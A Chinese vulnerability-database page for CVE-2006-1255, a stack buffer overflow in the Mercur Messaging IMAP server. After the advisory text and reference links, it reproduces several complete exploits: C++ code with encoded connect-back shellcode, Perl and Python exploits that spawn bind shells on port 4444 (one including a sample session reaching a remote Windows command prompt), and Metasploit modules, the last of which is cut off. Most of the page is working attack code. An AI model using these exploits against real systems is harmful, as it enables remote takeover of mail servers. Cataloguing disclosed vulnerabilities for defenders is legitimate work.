CVE-2006-1255
CVSS10.0
发布时间 :2006-03-18 20:02:00
修订时间 :2011-03-07 21:32:34
NMCOEP    

[原文]Stack-based buffer overflow in the IMAP service in Mercur Messaging 5.0 SP3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long string to the (1) LOGIN or (2) SELECT command, a different set of attack vectors and possibly a different vulnerability than CVE-2003-1177.


[CNNVD]Mercur Messaging IMAP服务缓冲区溢出漏洞(CNNVD-200603-291)

        Mercur Messaging 2005是Windows NT4、2000和XP平台上的邮件服务器软件,支持POP3、IMAP4和SMTP的所有当前RFC标准。
        Mercur Messaging 2005在处理IMAP命令时存在边界条件错误,远程攻击者可以向LOGIN和SELECT命令发送超长参数,触发栈溢出,导致拒绝服务。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1255
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1255
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-291
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/25290
(UNKNOWN)  XF  mercur-imap-bo(25290)
http://www.vupen.com/english/advisories/2006/0977
(UNKNOWN)  VUPEN  ADV-2006-0977
http://www.securityfocus.com/bid/17138
(UNKNOWN)  BID  17138
http://www.osvdb.org/23950
(UNKNOWN)  OSVDB  23950
http://secunia.com/advisories/19267
(VENDOR_ADVISORY)  SECUNIA  19267
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/043972.html
(UNKNOWN)  FULLDISC  20060316 Re: Mercur IMAPD 5.0 SP3 DoS Exploit or more?
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/043972.html
(UNKNOWN)  FULLDISC  20060316 Re: Mercur IMAPD 5.0 SP3 DoS Exploit or more?

- 漏洞信息

Mercur Messaging IMAP服务缓冲区溢出漏洞
危急 缓冲区溢出
2006-03-18 00:00:00 2007-05-01 00:00:00
远程  
        Mercur Messaging 2005是Windows NT4、2000和XP平台上的邮件服务器软件,支持POP3、IMAP4和SMTP的所有当前RFC标准。
        Mercur Messaging 2005在处理IMAP命令时存在边界条件错误,远程攻击者可以向LOGIN和SELECT命令发送超长参数,触发栈溢出,导致拒绝服务。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.atrium-software.com/index.php?content=mercur&lframe=navigation&rframe=navmercur&lang=en

- 漏洞信息 (1592)

Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (EDBID:1592)
windows remote
2006-03-19 Verified
0 pLL
N/A [点击下载]
/*
 * mercur.cpp
 *
 * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
 * Copyright (C) 2006 Javaphile Group
 * http://www.javaphile.org
 *
 * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
 *
 * Bug Reference:
 * http://www.frsirt.com/bulletins/4332
 *
 */

#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

SOCKET ConnectTo(char *ip, int port)
{
	WSADATA	wsaData;
	SOCKET	s;
	struct	hostent		*he;
	struct	sockaddr_in	host;
	int		nTimeout=150000;

	if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
	{
		printf("[-]WSAStartup failed.\n");
		exit(-1);
	}

	if((he=gethostbyname(ip))==0)
	{
		printf("[-]Failed to resolve '%s'.", ip);
		exit(-1);
	}

	host.sin_port=htons(port);
	host.sin_family=AF_INET;
	host.sin_addr=*((struct in_addr *)he->h_addr);

	if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("[-]Failed creating socket.");
 		exit(-1);
 	}

	if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
	{
		closesocket(s);
		printf("[-]Failed connecting to host.\n");
		exit(-1);
	}
	setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
	return s;
}


void Disconnect(SOCKET s)
{
	closesocket(s);
	WSACleanup();
}

void PrintSc(unsigned char *sc, int len)
{
    int    i,j;
    char *p;
    char msg[6];

    //printf("/* %d bytes */\n", buffsize);

    // Print general shellcode
    for(i = 0; i < len; i++)
    {
        if((i%16)==0)
        {
            if(i!=0)
                printf("\"\n\"");
            else
                printf("\"");
        }

        //printf("\\x%.2X", sc[i]);

        sprintf(msg, "\\x%.2X", sc[i] & 0xff);

        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                printf("%c", _tolower(*p));
            else
                printf("%c", p[0]);
        }
    }

    printf("\";\n");
}

void main(int argc,char* argv[])
{

	struct OSTYPE
	{
		unsigned int ret;
		char des[255];
	};

	OSTYPE os[] = {
		{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
		{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
		{0xDDDDDDDD, "Debug"},
		{0, NULL}
	};

	unsigned char shellcode[]=
	/* ip offset: 71 + 21 = 92 */
	/* port offset: 78 + 21 = 99 */
	/* 21 bytes decode */
	"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
	"\xe8\xed\xff\xff\xff"
	/* 254 bytes shellcode, xor with 0xee */
	"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
	"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
	"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
	"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
	"\x84\xec\x11\xb8\xfe\x7d\x86"
	"\x91\xee\xee\xef"				//ip
	"\x86"
	"\xec\xee"
	"\xee\xdb"						//port
	"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
	"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
	"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
	"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
	"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
	"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
	"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
	"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
	"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
	"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
	"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

	unsigned char FindSc[]=
	"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
	"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
	"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
	"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
	"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
	"\x04\x13\x33\xC0\xC3"
	"\x90\x90\x90\x90"
	"\xEB\xA5";


	if(argc < 5)
	{
		printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
		printf("-------------------------------------------\n");
		printf("Usage:\n");
		printf("   %s <Victim> <Connect back IP> <Connect back Port> <OsType>\n", argv[0]);
		printf("\nType could be:\n");

		int i=0;
		while(os[i].ret)
		{
			printf(" [%d]  %s\n", i, os[i].des);
			i++;
		}
		return;
	}

	SOCKET	s=ConnectTo(argv[1],143);

	printf("[+]Connected to target...");

	char szRecvBuff[600] = {0};

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "MERCUR") == NULL)
	{
		printf("[-]Seems not IMAP running.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems IMAP running.\n");
	}

	unsigned long dwCbIp=inet_addr(argv[2]);

	unsigned short q=(unsigned short)atoi(argv[3]);
	unsigned short dwCbPort=(unsigned short)q;

	dwCbIp=dwCbIp^0xEEEEEEEE;
	dwCbPort=dwCbPort^0xEEEE;

	shellcode[92] =(char) (dwCbIp & 0x000000FF);
	shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
	shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
	shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);

	shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
	shellcode[100] =(char) (dwCbPort & 0x000000FF);

	char	szUserName[20]={0};
	printf("[?]Username:");
	gets(szUserName);

	char	szPassWord[20]={0};
	printf("[?]Passwd:");
	gets(szPassWord);

	char	szLogin[]=" login ";
	char	szLoginInfo[50]={0};
	unsigned char	szSpace=0x20;
	char szEnd[]="\r\n";

	memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
	int		dwLen=lstrlen(szUserName);
	memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
	dwLen+=lstrlen(szLogin);
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,&szSpace,1);
	dwLen++;
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));

//	printf("%s\n",szLoginInfo);

	printf("[+]Sending Login Info...");

	send(s,szLoginInfo,lstrlen(szLoginInfo),0);

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "OK") == NULL)
	{
		printf("[-]Seems not a valid user or not support IMAP.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems a valid user.\n");
	}

	char	szSelect[]=" select ";
	char	szMagicData[1000]={0};

	memset(szMagicData,'A',sizeof(szMagicData)-1);
	memcpy(szMagicData,szUserName,lstrlen(szUserName));
	memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);

	int p=atoi(argv[4]);
	*(unsigned int *)&FindSc[85] = os[p].ret;

	memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);

	memcpy(szMagicData+251,szEnd,sizeof szEnd-1);

	char	szAdog[]="AGOU";
	memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+261,shellcode,sizeof shellcode-1);

	memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);

	printf("[+]Sending Magic Data To server...Good Luck!\n");
	send(s,szMagicData,sizeof szMagicData-1,0);

	recv(s,szRecvBuff,sizeof(szRecvBuff),0);
	printf("%s\n",szRecvBuff);

	Disconnect(s);
	printf("[?]Sending finished...Good luck!\n");
}

// milw0rm.com [2006-03-19]
		

- 漏洞信息 (3133)

Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit (EDBID:3133)
windows remote
2007-01-15 Verified
143 Jacopo Cervini
[点击下载] [点击下载]
#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have an another valid account you must change the offsets this is only a poc
#

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";

my $nop = "\x90"x8;

my $nop1 = "\x90"x20;

my $ret = "\x42\xb2\xc1\x40";

#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe

my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";

#	asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode
#
#	8BC7           MOV EAX,EDI
#	83C0 23        ADD EAX,23
#	50             PUSH EAX                                
#	C3             RETN




#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host


my $shellcode = 
"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "a001 LOGIN $user $pass\r\n";

send $socket, $request, 0;
print "[+] Sent login\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ."\r\n";

send $socket, $request, 0;
print "[+] Sent chunk\n";

print " + Connect on port 4444 of $host ...\n";
system("telnet $host 4444");

close $socket;
exit;

# milw0rm.com [2007-01-15]
		

- 漏洞信息 (3540)

Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod) (EDBID:3540)
windows remote
2007-03-21 Verified
143 muts
[点击下载] [点击下载]
#!/usr/bin/python
# 
# Mercur Messaging 2005 SP3 IMAP service - Egghunter mod
# muts@offensive-security.com
# http://www.offensive-security.com
# Original exploit by Winny Thomas
# Thanks Thomas, this code really came in handy !
# VMWare seems to alter the stack a bit as the offset 
# of the EIP overwrite was a few bytes off (Windows XPsp2).
# You can inject more than 2000 bytes using an IMAP command (I chose LIST), 
# and then let the egghunter do the rest of the work.
# The initial injected buffer gets cut off, so you need to double check that.
# 
# bt ~ # ./imap.py 192.168.0.75 test test
# * OK MERCUR IMAP4-Server (v5.00.14 Unregistered) for Windows ready at Thu, 22 Mar 2007 00:59:19 +0200
# a001 OK LOGIN completed
# BAD Command unknown
# Shell on port 4444
# 
# bt ~ # nc -v 192.168.0.75 4444
# 192.168.0.75: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.75] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:\WINDOWS\system32>

 

import os
import sys
import time
import socket
import struct

# Place our w00tw00t egghunter in nop heaven

shellcode = "\x90" * 92 
shellcode +="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode +="\x90" * 100
 
# Place w00t and bindshell in correct place in LIST command.

bindshell = "\x90" * 320
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" 

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")

# Pad the injected command

bindshell +="\xcc" * 1000

def ExploitMercur(target, username, passwd):
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, 143))
	response = sock.recv(1024)
	print response
	login = 'a001 LOGIN ' + username + ' ' + passwd + '\r\n'
	sock.send(login)
	response = sock.recv(1024)
	print response
	imaplist = 'a001 LIST ' + bindshell + '\r\n'
	sock.send(imaplist)
	response = sock.recv(1024)
	print response
	payload = shellcode
	payload += 'L' * 1
	payload += 'Y' * 4
	payload += 'Z' * 4
#	01883A50	FFD3	CALL EBX	MCRFAX.DLL
	payload += struct.pack('<L', 0x01883A50)
	payload += 'L' *  27
	payload += 'M' *  16
	payload += ' ' + '\"/\"' + ' ' + '\"\"'
	req = 'a001 SUBSCRIBE ' + payload + '\r\n'
	sock.send(req)
	sock.close()
	print 'Shell on port 4444'

def ConnectRemoteShell(target):
	connect = "/usr/bin/telnet " + target + " 4444"
	os.system(connect)

if __name__=="__main__":
	try:
		target = sys.argv[1]
		username = sys.argv[2]
		passwd = sys.argv[3]
	except IndexError:
		print 'Usage: %s <imap server> <username> <password>\n' % sys.argv[0]
		sys.exit(-1)
	ExploitMercur(target, username, passwd)

# milw0rm.com [2007-03-21]
		

- 漏洞信息 (16476)

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow (EDBID:16476)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mercur_imap_select_overflow.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
			'Description'    => %q{
					Mercur v5.0 IMAP server is prone to a remotely exploitable
				stack-based buffer overflow vulnerability. This issue is due
				to a failure of the application to properly bounds check
				user-supplied data prior to copying it to a fixed size memory buffer.
				Credit to Tim Taylor for discover the vulnerability.
			},
			'Author'         => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
					['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 17 2006'))

	end

	def exploit
		sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"
		sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])
		sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)
		sploit << payload.encoded + rand_text_alpha_upper(453)

		info = connect_login

		if (info == true)
			print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")
		end

		handler
		disconnect
	end
end
		

- 漏洞信息 (16481)

Mercur Messaging 2005 IMAP Login Buffer Overflow (EDBID:16481)
windows remote
2010-08-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mercur_login.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.
				Since the room for shellcode is small, using the reverse ordinal payloads
				yields the best results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 228,
					'BadChars' => "\x00\x20\x2c\x3a\x40",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP2 English',   { 'Ret' => 0x77dc15c0 } ],
				],
			'DisclosureDate' => 'Mar 17 2006',
			'DefaultTarget'  => 0))

		register_options( [ Opt::RPORT(143) ], self.class )
	end

	def exploit
		connect
		sock.get_once

		hunter  = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
		egg     = hunter[1]

		sploit	=  "A001 LOGIN " + egg + hunter[0]
		sploit	<< [target.ret].pack('V') + [0xe9, -175].pack('CV')

		print_status("Trying target #{target.name}...")
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83031)

Mercur Messaging 2005 IMAP Login Buffer Overflow (PacketStormID:F83031)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap,shellcode
CVE-2006-1255
[点击下载]

This Metasploit module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3.
				Since the room for shellcode is small, using the reverse ordinal payloads
				yields the best results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},			
			'Payload'        =>
				{
					'Space'    => 228,
					'BadChars' => "\x00\x20\x2c\x3a\x40",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",	
				},
